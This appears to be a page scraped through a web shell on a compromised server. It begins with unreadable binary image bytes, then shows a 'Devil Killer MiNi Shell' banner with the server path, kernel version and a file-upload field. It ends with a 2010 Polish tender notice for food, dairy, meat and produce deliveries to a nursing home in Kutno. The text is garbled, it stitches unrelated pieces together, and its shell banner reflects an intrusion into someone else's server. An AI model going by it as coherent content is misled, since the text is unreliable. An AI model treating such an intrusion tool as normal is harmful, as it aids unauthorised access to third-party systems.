JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100518/135354-N-2010.html

<p class="kh_header"><b>Kutno: Sprzedaż i dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Kutnie .</b><br>
<b>Numer ogłoszenia: 135354 - 2010; data zamieszczenia: 18.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Bolesława Krzywoustego 11, 99-300 Kutno, woj. łódzkie, tel. 0-24 253 64 32, faks 0-24 253 64 32.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.dps.powiatkutnowski.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Kutnie ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Załącznik nr 1.
Wykaz produktów  i artykułów  będących przedmiotem zamówienia
część 1 : artykuły spożywcze 
Lp.	Nazwa artykułu spożywczego	Jednostka miary	Ilość*
1	Aromaty do ciasta 	10 g	- 20,
2	Barszcz biały	40 g	- 200,
3	bazylia	paczka 10g	- 40,
4	biszkopty	kg	- 40,
5	budyń 	paczka 40g	- 200,
6	chrzan	Słoik 190g	- 170,
7	cukier biały kryształ	kg	- 1550,
8	Cukier puder	500 g	- 15,
9	Cukier waniliowy	16 g	- 50,
10	cynamon	paczka 20g	- 10,
11	Czosnek granulowany	paczka 20g	- 40,
12	ćwikła	Słoik 280g -	20,
13	dżem owocowy	Słoik 550g	- 350,
14	estragon	paczka 10g	- 40,
15	Filety rybne	kg	- 300,
16	Filety śledziowe	kg -	80,
17	galaretka	90 g -	450,
18	Gałka muszkatałowa	paczka 10g	- 20,
19	groszek konserwowy	Puszka 400 g	- 200,
20	herbata	100 g	-1100,
21	Herbatniki petit beure	paczka 100 g	- 400,
22	imbir	paczka 20g	- 20,
23	jajka	 sztuk	-14000,
24	kakao 200g	paczka	- 50,
25	Kapusta kwaszona	kg	- 400,
26	Karp żywy	kg	- 15,
27	Kasza gryczana	kg	- 75,
28	kasza jęczmienna	Kg	- 170,
29	Kasza manna 400 g	paczka	- 185,
30	kawa inka 150g	paczka	- 40,
31	ketchup 500g 	sztuka	 - 150,
32	Kisiel 60 g	paczka	- 300,
33	koncentrat pomidorowy  30% 	0,9 l	-150,
34	koncentrat pomidorowy  30% 	0,2 l	- 15,
35	konserwa rybna w oleju 170g.	sztuka	- 200,
36	konserwa rybna w pomidorach 170g. 	sztuka	- 200,
37	kukurydza konserwowa	Puszka 400 g	-50,
38	Kwasek cytrynowy 20 g	Paczka	- 150,
39	liść laurowy	paczka 8 g	- 80,
40	majeranek	paczka 20g	-100
41	majonez dekoracyjny 	słoik 700g	- 100,
42	makaron 0,5 kg	sztuka	- 1000
43	Mąka pszenna	kg	- 500,
44	mąka ziemniaczana 	kg -	15,
45	miód 900g	słoik	- 80,
46	musztarda 190g	słoik	- 250,
47	ocet 	butelka 0,5l -	50,
48	ogórki kwaszone 	 wiaderko 3 kg 	- 249,
49	olej 	butelka 1 l	- 300,
50	oregano	paczka 10g	-40,
51	papryka słodka - przyprawa	paczka 20g	- 150,
52	paprykarz szczeciński	puszka 300g	- 50,
53	pieprz 	paczka 20g	-350,
54	Pieprz ziołowy	paczka 20g	- 200,
55	płatki jęczmienne 400 g	paczka	- 85,
56	płatki kukurydziane 500 g	paczka -	60,
57	płatki owsiane 400 g	paczka	- 85,
58	powidła	Słoik/ Wiaderko  1kg	- 100,
59	Proszek do pieczenia	paczka 40g	- 40,
60	Kucharek  200g	paczka	- 150,
61	Przyprawa do zup 	butelka 1 l	- 80,
62	Ryba wędzona ( makrela)	kg	- 60,
62	ryż 	kg	- 300,
63	Syrop owocowy	0,5 l	- 500,
64	sól	kg	- 370,
65	Wiórki kokosowe	paczka 100g	- 10,
66	Woda mineralna 1,5 l  n/gaz.	sztuk	- 500,
67	ziele angielskie	paczka  15 g	- 60,
68	Zioła prowansalskie	paczka 10g	- 40,
69	Zupa grzybowa	40 g	- 100,
70	Zupa ogonowa	50 g	- 100,
71	Zupa pieczarkowa	40 g	- 100,
72	żurek 	40 g - 150,
 	 
Załącznik nr 2. 
część 2:  nabiał
Lp.	Nazwa artykułu spożywczego	Jednostka miary	Ilość*
1	Mleko 2%	1 l.	- 500,
2	śmietana 18%	400 g	- 550,
3	Śmietana (Mizeria)	450 g	- 120,
4	ser żółty	kg	- 150,
5	twaróg	kg	- 500,
6	ser Hochland 	150g	- 900,
7	ser topiony	100 g	- 500,
8	Mleko w proszku	kg	-400 ,
9	jogurty 	150 g	- 1000,
10	serek homogenizowany	150 g	- 100,
11	Masło śmietankowe	200 g	- 770,
12	Masło Extramix	400 g	- 2000,
13	Serek fromage	75	- 400,

Załącznik nr 3. 
część 3:  mięso i wędliny wieprzowe
Lp.	Nazwa produktu 	Jednostka miary	Ilość*
1	kiełbasa zwyczajna	80kg,	
2	kiełbasa śląska	80kg,	
3	kiełbasa biała parzona	50kg,	
4	kiełbasa wiejska 80kg,	
5	kiełbasa krakowska	120kg,	
6	kiełbasa szynkowa	120kg	,
7	Kiełbasa mortadela	85kg,	
8	Kiełbasa parówkowa	80kg	,
9	Kiełbasa mielonka		120kg,
10	kaszanka 120kg,
11	salceson	80kg,
12	pieczeń	60kg,	
13	Szynka wędzona parzona	120kg	,
14	Baleron wędzony parzony	75kg,	
15	Boczek wędzony parzony	60kg,
16	Polędwica sopocka	40kg,	
17	czarne	50kg,	
18	Słonina 	120kg,	
19	kości 225kg	,
20	Kości wędzone	75kg,
21	łopatka bez kości 150kg	,
22	karkówka bez kości	50kg,
23	nogi wieprzowe	40kg.	
24	golonki 100kg,	
25	ozory 	120kg,
26	Mięso mielone	300kg,
27	szynka bez kości	50kg,
28	żeberka 120kg,
29	Wołowina bez kości kl. I		50kg,
30	Wołowina bez kości kl. II	50kg
31	Wołowina antrykot	kg	175
32	schab z kością		165kg,
33	Schab bez kości	50kg,	
34	Gulasz angielski 300g	100 sztuk,
35	Szynka gospodarcza 110 g	300 sztuk,
36	Pasztet mięsny 290 g	100 sztuk,	
37	Konserwa turystyczna 300 g	300sztuk,	
38	Pasztetowa		60kg.

Załącznik nr 4. 
część 4:  mięso i wędliny drobiowe
Lp.	Nazwa produktu 	Jednostka miary	Ilość*
1	kurczaki		300kg,
2	filet drobiowy		160kg,
3	wątróbka drobiowa		200kg,
4	porcje rosołowe	400,
5	serca		50kg,
6	Noga z kurczaka		420kg,
7	Skrzydła drobiowe	 100kg,
8	żołądki		200kg,
9	mortadela drobiowa		100kg,
10	polędwica drobiowa		120kg,
11	Pasztetowa drobiowa		50kg,
12	pieczeń drobiowa		100kg,
13	Baleron drobiowy		150kg,
14	Pasztet drobiowy	50kg,
15	kiełbasa gruba drobiowa		70kg,
16	szynka drobiowa		200kg,
19	Salceson drobiowy		70kg,
20	kiełbasa cienka drobiowa		200kg,
21	kiełbasa parówki drobiowe		   150kg,
22	Pasztet drobiowy 135 g	 	500sztuk,

Załącznik nr 5. 
część 5:  owoce i warzywa
Lp.	Nazwa produktu 	Jednostka miary	Ilość*
1	jabłka	 1300	kg,
2	truskawki		200kg,
3	wiśnie		100kg,
4	śliwki	150kg,
5	brzoskwinie		50kg,
6	Porzeczka czarna	50kg,
7	aronia		50kg,
8	rabarbar		80kg,
9	banany		250kg
10	mandarynki		100kg,
11	cytryny		25kg,
12	kiwi		100sztuk,
13	Jabłka suszone 150g	4 paczki,	
14	Gruszka suszona 150g	2 paczki,
15	Śliwki suszone	1kg	1
16	Grzyby suszone 20g	10 paczek,	
19	Susz owocowy 100 g	400 sztuk	
20	Rodzynki 100 g	30 sztuk	
22	ziemniaki		9000kg,
23	marchew		1400kg,
24	pietruszka	300kg,
25	seler	350kg,
26	por		150kg,
27	cebula		500kg,
28	Burak  czerwony		500k,g
29	Fasola biała		50kg,
30	Fasolka szparagowa		50kg,
31	Kapusta biała		170kg,
32	Kapusta młoda		250 sztuk,
33	Kapusta czerwona		50kg,
34	Kapusta pekińska		60kg,
35	kalafior		150 sztuk,
36	Sałata 	170 sztuk,	
37	Rzodkiewka 	180 pęczków,	
38	Szczypior 		100 pęczków,
39	włoszczyzna		500 pęczków,
41	Pomidory 		700kg,
42	Ogórki zielone		250k,g
43	Pieczarki 		180kg,
44	Papryka 		50kg, 
45	Natka pietruszki		70 pęczków,
46	Koperek 		170 pęczków,
47	Botwina 		60 pęczków,
48	Szczaw 		15kg,
49	Czosnek 		50sztuk,
50	Mieszanka warzyw - mrożonka 450 g	150sztuk	
  * Podane w kolumnie ilość  wielkości produktów są wartościami szacunkowymi.

Zamawiający dopuszcza możliwość składania ofert częściowych, na poszczególne części zamawianego asortymentu: 
Część 1: sprzedaż i dostawa artykułów spożywczych
Część 2: sprzedaż i dostawa nabiału
Część 3: sprzedaż i dostawa mięsa i wędlin wieprzowych
Część 4: sprzedaż i dostawa mięsa i wędlin drobiowych
Część 5: sprzedaż i dostawa owoców i warzyw
Wykonawca może złożyć ofertę zarówno na część 1, część 2, część 3, część 4 i część 5 zamówienia.
- Zamawiający nie dopuszcza możliwości składania ofert wariantowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dps.powiatkutnowski.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
ul. Krzywoustego 11
99-300 Kutno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2010 godzina 14:00, miejsce: Dom Pomocy Społecznej
ul. Krzywoustego 11
99-300 Kutno.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1: sprzedaż i dostawa artykułów spożywczych dla DPS w Kutnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sprzedaż i dostawa artykułów spożywczych dla Domu Pomocy Społecznej w Kutnie część 1 : artykuły spożywcze 
Lp.	Nazwa artykułu spożywczego	Jednostka miary	Ilość*
1	Aromaty do ciasta 	10 g	- 20,
2	Barszcz biały	40 g	- 200,
3	bazylia	paczka 10g	- 40,
4	biszkopty	kg	- 40,
5	budyń 	paczka 40g	- 200,
6	chrzan	Słoik 190g	- 170,
7	cukier biały kryształ	kg	- 1550,
8	Cukier puder	500 g	- 15,
9	Cukier waniliowy	16 g	- 50,
10	cynamon	paczka 20g	- 10,
11	Czosnek granulowany	paczka 20g	- 40,
12	ćwikła	Słoik 280g -	20,
13	dżem owocowy	Słoik 550g	- 350,
14	estragon	paczka 10g	- 40,
15	Filety rybne	kg	- 300,
16	Filety śledziowe	kg -	80,
17	galaretka	90 g -	450,
18	Gałka muszkatałowa	paczka 10g	- 20,
19	groszek konserwowy	Puszka 400 g	- 200,
20	herbata	100 g	-1100,
21	Herbatniki petit beure	paczka 100 g	- 400,
22	imbir	paczka 20g	- 20,
23	jajka	 sztuk	-14000,
24	kakao 200g	paczka	- 50,
25	Kapusta kwaszona	kg	- 400,
26	Karp żywy	kg	- 15,
27	Kasza gryczana	kg	- 75,
28	kasza jęczmienna	Kg	- 170,
29	Kasza manna 400 g	paczka	- 185,
30	kawa inka 150g	paczka	- 40,
31	ketchup 500g 	sztuka	 - 150,
32	Kisiel 60 g	paczka	- 300,
33	koncentrat pomidorowy  30% 	0,9 l	-150,
34	koncentrat pomidorowy  30% 	0,2 l	- 15,
35	konserwa rybna w oleju 170g.	sztuka	- 200,
36	konserwa rybna w pomidorach 170g. 	sztuka	- 200,
37	kukurydza konserwowa	Puszka 400 g	-50,
38	Kwasek cytrynowy 20 g	Paczka	- 150,
39	liść laurowy	paczka 8 g	- 80,
40	majeranek	paczka 20g	-100
41	majonez dekoracyjny 	słoik 700g	- 100,
42	makaron 0,5 kg	sztuka	- 1000
43	Mąka pszenna	kg	- 500,
44	mąka ziemniaczana 	kg -	15,
45	miód 900g	słoik	- 80,
46	musztarda 190g	słoik	- 250,
47	ocet 	butelka 0,5l -	50,
48	ogórki kwaszone 	 wiaderko 3 kg 	- 249,
49	olej 	butelka 1 l	- 300,
50	oregano	paczka 10g	-40,
51	papryka słodka - przyprawa	paczka 20g	- 150,
52	paprykarz szczeciński	puszka 300g	- 50,
53	pieprz 	paczka 20g	-350,
54	Pieprz ziołowy	paczka 20g	- 200,
55	płatki jęczmienne 400 g	paczka	- 85,
56	płatki kukurydziane 500 g	paczka -	60,
57	płatki owsiane 400 g	paczka	- 85,
58	powidła	Słoik/ Wiaderko  1kg	- 100,
59	Proszek do pieczenia	paczka 40g	- 40,
60	Kucharek  200g	paczka	- 150,
61	Przyprawa do zup 	butelka 1 l	- 80,
62	Ryba wędzona ( makrela)	kg	- 60,
62	ryż 	kg	- 300,
63	Syrop owocowy	0,5 l	- 500,
64	sól	kg	- 370,
65	Wiórki kokosowe	paczka 100g	- 10,
66	Woda mineralna 1,5 l  n/gaz.	sztuk	- 500,
67	ziele angielskie	paczka  15 g	- 60,
68	Zioła prowansalskie	paczka 10g	- 40,
69	Zupa grzybowa	40 g	- 100,
70	Zupa ogonowa	50 g	- 100,
71	Zupa pieczarkowa	40 g	- 100,
72	żurek 	40 g - 150,
 	 
  * Podane w kolumnie ilość  wielkości produktów są wartościami szacunkowymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sprzedaż i dostawa nabiału dla Domu Pomocy Społecznej w Kutnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sprzedaż i dostawa nabiału dla Domu Pomocy Społecznej w Kutnie. 
część 2:  nabiał

Załącznik nr 2. 
część 2:  nabiał
Lp.	Nazwa artykułu spożywczego	Jednostka miary	Ilość*
1	Mleko 2%	1 l.	- 500,
2	śmietana 18%	400 g	- 550,
3	Śmietana (Mizeria)	450 g	- 120,
4	ser żółty	kg	- 150,
5	twaróg	kg	- 500,
6	ser Hochland 	150g	- 900,
7	ser topiony	100 g	- 500,
8	Mleko w proszku	kg	-400 ,
9	jogurty 	150 g	- 1000,
10	serek homogenizowany	150 g	- 100,
11	Masło śmietankowe	200 g	- 770,
12	Masło Extramix	400 g	- 2000,
13	Serek fromage	75	- 400,

  * Podane w kolumnie ilość  wielkości produktów są wartościami szacunkowymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sprzedaż i dostawa mięsa i wędlin wieprzowych dla Domu Pomocy Społecznej w Kutnie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sprzedaż i dostawa mięsa i wędlin wieprzowych dla Domu Pomocy Społecznej w Kutnie.
Lp.	Nazwa produktu 	Jednostka miary	Ilość*
1	kiełbasa zwyczajna	80kg,	
2	kiełbasa śląska	80kg,	
3	kiełbasa biała parzona	50kg,	
4	kiełbasa wiejska 80kg,	
5	kiełbasa krakowska	120kg,	
6	kiełbasa szynkowa	120kg	,
7	Kiełbasa mortadela	85kg,	
8	Kiełbasa parówkowa	80kg	,
9	Kiełbasa mielonka		120kg,
10	kaszanka 120kg,
11	salceson	80kg,
12	pieczeń	60kg,	
13	Szynka wędzona parzona	120kg	,
14	Baleron wędzony parzony	75kg,	
15	Boczek wędzony parzony	60kg,
16	Polędwica sopocka	40kg,	
17	czarne	50kg,	
18	Słonina 	120kg,	
19	kości 225kg	,
20	Kości wędzone	75kg,
21	łopatka bez kości 150kg	,
22	karkówka bez kości	50kg,
23	nogi wieprzowe	40kg.	
24	golonki 100kg,	
25	ozory 	120kg,
26	Mięso mielone	300kg,
27	szynka bez kości	50kg,
28	żeberka 120kg,
29	Wołowina bez kości kl. I		50kg,
30	Wołowina bez kości kl. II	50kg
31	Wołowina antrykot	kg	175
32	schab z kością		165kg,
33	Schab bez kości	50kg,	
34	Gulasz angielski 300g	100 sztuk,
35	Szynka gospodarcza 110 g	300 sztuk,
36	Pasztet mięsny 290 g	100 sztuk,	
37	Konserwa turystyczna 300 g	300sztuk,	
38	Pasztetowa		60kg

Podane w kolumnie ilość  wielkości produktów są wartościami szacunkowymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.14.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sprzedaż i dostawa  mięsa i wędlin drobiowych dla Domu Pomocy Społecznej w Kutnie ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część 4:  mięso i wędliny drobiowe
Lp.	Nazwa produktu 	Jednostka miary	Ilość*
1	kurczaki		300kg,
2	filet drobiowy		160kg,
3	wątróbka drobiowa		200kg,
4	porcje rosołowe	400,
5	serca		50kg,
6	Noga z kurczaka		420kg,
7	Skrzydła drobiowe	 100kg,
8	żołądki		200kg,
9	mortadela drobiowa		100kg,
10	polędwica drobiowa		120kg,
11	Pasztetowa drobiowa		50kg,
12	pieczeń drobiowa		100kg,
13	Baleron drobiowy		150kg,
14	Pasztet drobiowy	50kg,
15	kiełbasa gruba drobiowa		70kg,
16	szynka drobiowa		200kg,
19	Salceson drobiowy		70kg,
20	kiełbasa cienka drobiowa		200kg,
21	kiełbasa parówki drobiowe		   150kg,
22	Pasztet drobiowy 135 g	 	500sztuk,

  * Podane w kolumnie ilość  wielkości produktów są wartościami szacunkowymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.13.11.35-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sprzedaż i dostawa owoców i warzyw dla Domu Pomocy Społecznej w Kutnie ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część 5:  owoce i warzywa
Lp.	Nazwa produktu 	Jednostka miary	Ilość*
1	jabłka	 1300	kg,
2	truskawki		200kg,
3	wiśnie		100kg,
4	śliwki	150kg,
5	brzoskwinie		50kg,
6	Porzeczka czarna	50kg,
7	aronia		50kg,
8	rabarbar		80kg,
9	banany		250kg
10	mandarynki		100kg,
11	cytryny		25kg,
12	kiwi		100sztuk,
13	Jabłka suszone 150g	4 paczki,	
14	Gruszka suszona 150g	2 paczki,
15	Śliwki suszone	1kg	1
16	Grzyby suszone 20g	10 paczek,	
19	Susz owocowy 100 g	400 sztuk	
20	Rodzynki 100 g	30 sztuk	
22	ziemniaki		9000kg,
23	marchew		1400kg,
24	pietruszka	300kg,
25	seler	350kg,
26	por		150kg,
27	cebula		500kg,
28	Burak  czerwony		500k,g
29	Fasola biała		50kg,
